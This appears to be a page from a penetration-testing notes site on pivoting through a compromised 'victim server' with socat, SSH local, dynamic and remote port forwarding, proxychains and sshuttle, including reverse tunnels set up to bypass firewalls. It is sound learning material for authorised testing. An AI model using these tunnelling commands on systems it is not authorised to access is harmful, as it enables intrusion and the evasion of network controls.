Port Forwarding and SSH Tunneling

Port Forwarding [Socat]

If socat is not installed it's possible to download and run a statically-linked binary version instead.

You are able to open a port on a machine that will allow us to forward our traffic through the victim's server.

Listen on PORT1.

Then forward all traffic it receives to TCP PORT2 on the another IP machine.

Now you PORT1 becomes PORT2 on the other machine.

socat -ddd TCP-LISTEN:<PORT1>,fork TCP:<IP>:<PORT2> # open port

SSH Tunneling

You can tunnel the network traffic through other servers using SSH.

SSH Local Port Forwarding

Sharing a specific port across the networks.

0.0.0.0:<PORT1> - We are opening port on machine we execute the command

<DESTINATION_IP>:<PORT2> - Machine which we want to "borrow" port from

<USER_JUMP>@<JUMP_IP> - Proxy server which has access to both networks

ssh -N -L 0.0.0.0:<PORT1>:<DESTINATION_IP>:<PORT2> <USER_JUMP>@<JUMP_IP>

SSH Dynamic Port Forwarding

Sharing jumphost which allow to reach multiple ports across the network using proxychains.

0.0.0.0:<LOCAL_PORT> - opening a port on the machine we execute the command

<USER>@<IP> - remote machine which will forward our commands

ssh -N -D 0.0.0.0:<LOCAL_PORT> <USER>@<IP>

Edit the /etc/proxychains4.conf:

socks5 <IP> <PORT>

You can run the commands using proxychains:

proxychains <command>

SSH Remote Port Forwarding

Reverse shell but for port forwarding
Bypassing firewall by creation outgoing SSH traffic from victim server. Port can be shared even if we have no access to connect to any port on the victim server.

Kali set up:

PasswordAuthentication to yes in /etc/ssh/sshd_config.
PermitRootLogin to yes in /etc/ssh/sshd_config.

Start ssh:

sudo systemctl start ssh

Check if port is in fact open

sudo ss -ntplu

Victim Server set up:

ssh -N -R 127.0.0.1:<KALI_PORT>:<VICTM_SERVER>:<VICTIM_PORT> kali@<KALI_IP>

Kali check:

ss -ntplu

If everything went right you should be able to access the port on your kali machine.

SSH Remote Dynamic Port Forwarding

Required OpenSSH 7.6 or newer.

Reverse shell but for port forwarding (multiple ports instead of one)

Victim server:

ssh -N -R <PORT> kali@<KALI_IP>

Kali opened port check:

sudo ss -ntplu

Sshuttle

Requires root privileges and python3

SSH as VPN that force traffic through the SSH tunnel

sshuttle -r <user>@<IP>:<SSH_PORT> <SUBNET1> <SUBNET2>

PreviousShell stabilization NextHTTP and DNS Tunneling

Last updated 1 year ago